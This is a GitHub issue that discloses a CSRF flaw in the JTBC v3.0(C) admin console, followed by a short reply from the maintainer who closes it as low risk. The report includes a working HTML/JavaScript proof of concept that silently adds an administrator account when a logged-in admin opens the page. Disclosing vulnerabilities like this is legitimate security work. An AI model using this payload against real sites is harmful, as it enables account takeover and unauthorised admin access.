Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There is CSRF vulnerability that can add the administrator account #4

Closed
Eth4nHunt opened this Issue Sep 18, 2018 · 1 comment

Comments

Projects
None yet
2 participants
@Eth4nHunt
Copy link

Eth4nHunt commented Sep 18, 2018

/console/account/manage.php?type=action&action=add in JTBC v3.0(C) has CSRF,After the administrator logged in, open the csrf exp page,will be add a administrator.
csrf exp:
1.html

<title>test csrf</title> <script type="text/javascript"> var url = "http://x.x.x.x/phpjtbc/console/account/manage.php?type=action&action=add"; var postStr='username=testcsrf&password=123456&cpassword=123456&role=-1&email=test%40test.com'; var ajax = null; if (window.XMLHttpRequest) { ajax = new XMLHttpRequest(); } else if (window.ActiveXObject) { ajax = new ActiveXObject("Microsoft.XMLHTTP"); } else { ajax=null; } ajax.open("POST", url, false); ajax.withCredentials = true; ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=utf-8"); ajax.send(postStr); </script>
@jetiben

This comment has been minimized.

Copy link
Owner

jetiben commented Sep 20, 2018

谢谢您的反馈,这是一个低危的问题,我会在有时候的时候进行完善。

@jetiben jetiben closed this Sep 20, 2018

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.